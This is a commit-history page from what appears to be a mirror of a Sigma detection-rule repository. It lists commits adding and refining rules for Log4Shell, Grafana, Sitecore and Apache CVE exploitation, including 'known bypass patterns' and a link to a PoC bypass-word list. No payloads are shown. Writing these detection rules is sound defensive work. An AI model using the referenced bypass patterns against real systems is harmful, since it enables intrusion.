security-tools/blue-team-tools
1
0
Fork 0
Code Issues Pull Requests Actions 1 Packages Projects Releases Wiki Activity
10,303 Commits 1 Branch 57 Tags
87a0bed0ecb2ffafff6422ff7dba2ffb85fcbc41
Commit Graph

244 Commits

Author SHA1 Message Date
Florian Roth 35d4c8bc69 fix: FPs noticed in THOR testing 2022-02-21 10:15:27 +01:00
Florian Roth e2aa3665af fix: avoid Microsoft Defender detections 
We keep the strings as specific as necessary while avoiding Microsoft Defender detections on the rule files
 2022-02-06 08:56:54 +01:00
frack113 4631d0c482 remove invalid tag 2022-01-19 18:23:30 +01:00
frack113 f7e670d55e Simple Quote 2022-01-11 13:40:53 +01:00
Florian Roth e055ec1d52 refactor: change all " of them" expressions 2022-01-11 10:59:57 +01:00
frack113 c6014b1205 Change status to test 2022-01-07 07:04:24 +01:00
frack113 73f258e2d1 Change double quote to quote 2022-01-06 14:02:35 +01:00
Fred Frey 44fecf8ebd typo 2021-12-16 12:12:37 -05:00
Fred Frey 05245b5ac7 implemented @frack113 1 of selection* suggestion 2021-12-16 12:09:39 -05:00
Fred Frey 972dfbc4d2 Log4j OR each section vs implicit AND 
When the original is compiled it requires one TRUE from each Field (implicit AND) ... believe the intent is to search all fields of any trace which hence explicit OR in "condition"
 2021-12-16 01:53:33 -05:00
Florian Roth baa5d3758d Merge branch 'master' into rule-devel 2021-12-13 18:05:17 +01:00
Florian Roth 51a4315ab9 fix: referrer > referer adjustments 2021-12-13 15:47:43 +01:00
Florian Roth fb167c5698 Merge pull request #2446 from izysec/patch-4 
Added current known bypass patterns
 2021-12-13 14:04:54 +01:00
Florian Roth 7b93291439 Merge pull request #2445 from izysec/patch-3 
Added current known bypass patterns
 2021-12-13 14:03:59 +01:00
Florian Roth 04ff26c786 Update web_cve_2021_44228_log4j_fields.yml 2021-12-13 11:47:55 +01:00
Florian Roth ea3f1c6228 changed expression 
the last part is already covered by the expression in line 38 but we can add the one that obfuscates the `jndi`
 2021-12-13 11:47:12 +01:00
izysec 5819aa9888 Added current known bypass patterns 
Source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
 2021-12-13 15:51:25 +05:30
izysec 6c8b0c8fd8 Added current known bypass patterns 
Source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
 2021-12-13 15:49:08 +05:30
Florian Roth 758334ac1c Merge branch 'rule-devel' of https://github.com/SigmaHQ/sigma into rule-devel 2021-12-13 09:02:38 +01:00
Florian Roth ef6fb35e2b more patterns for log4shell 2021-12-13 09:02:24 +01:00
Florian Roth d8613fedfe more Log4Shell patterns 2021-12-12 21:27:01 +01:00
Florian Roth 31ddcd4a0d Log4Shell - more patterns 2021-12-12 20:39:09 +01:00
Florian Roth 39217d4b44 rule: JNDIExploit 2021-12-12 13:16:05 +01:00
Florian Roth 63bb7673d6 Merge branch 'master' into rule-devel 2021-12-12 12:47:33 +01:00
Florian Roth 5da7537375 Merge pull request #2436 from izysec/patch-1 
Additional IoC keywords added log4j detection
 2021-12-12 12:46:36 +01:00
Florian Roth 23f59180d5 updated Log4Shell rules 2021-12-12 12:40:14 +01:00
izysec 0b9fd530e6 Additional IoC keywords added log4j detection 
Source: https://community.riskiq.com/article/505098fc/description
 2021-12-12 01:15:02 +05:30
izysec 61e7044d09 Additional IoC keywords added 
https://community.riskiq.com/article/505098fc/description
 2021-12-12 01:11:19 +05:30
Florian Roth a74eac7c7f refactor: added more variants to the field-based rule too 2021-12-11 08:23:43 +01:00
Florian Roth b9bc6646f9 improved log4j detection rule 2021-12-11 08:15:11 +01:00
Florian Roth 8ae7646b73 fix: duplicate ids 2021-12-10 16:14:14 +01:00
Florian Roth aef0179ba7 refactor: log4j rule refactoring 2021-12-10 16:01:43 +01:00
Florian Roth 07e4a9209c docs: more links 2021-12-10 13:31:28 +01:00
Florian Roth 06e41b1e57 refactor: single slash uri scheme + dns 2021-12-10 13:07:32 +01:00
Florian Roth a51c03f54c log4j CVE-2021-44228 2021-12-10 13:05:40 +01:00
Florian Roth 72e85fdc92 rule: Grafana CVE-2021-43798 2021-12-08 12:01:59 +01:00
Florian Roth 330fcf485c Merge branch 'master' into promote_status 2021-11-27 17:15:56 +01:00
frack113 01dc930c17 Change status for old rules 2021-11-27 11:33:14 +01:00
frack113 c6caab9e1e Fix optional section name 2021-11-27 11:27:40 +01:00
frack113 b81b5666ce fix field name 2021-11-23 18:47:42 +01:00
frack113 1cfca93354 Missing status in rules (#2284) 
* add missing status
 2021-11-19 22:32:26 +01:00
Florian Roth c6564908ef rule: Sitecore Pre-Auth RCE CVE-2021-42237 2021-11-17 19:01:35 +01:00
frack113 f8574fcd81 Add cve tags 2021-10-25 18:40:50 +02:00
Florian Roth 30213dba87 Merge pull request #2132 from SigmaHQ/rule-devel 
New Rules
 2021-10-09 19:19:45 +02:00
Florian Roth 195db4cffc refactor: made Apache RCE rule more robust 2021-10-09 18:48:02 +02:00
frack113 930d2d4223 fix id 2021-10-06 17:53:16 +02:00
frack113 dfd316c0ce Add web_iis_tilt_shortname_scan.yml 2021-10-06 17:46:15 +02:00
Florian Roth 7cf01c2f0c extended CVE-2021-41773 rule 2021-10-06 12:43:10 +02:00
Florian Roth 5576f50470 fix: title, add my name 2021-10-05 17:35:09 +02:00
Florian Roth 482df0a0ad rule: Apache Vuln CVE-2021-41773 2021-10-05 17:33:37 +02:00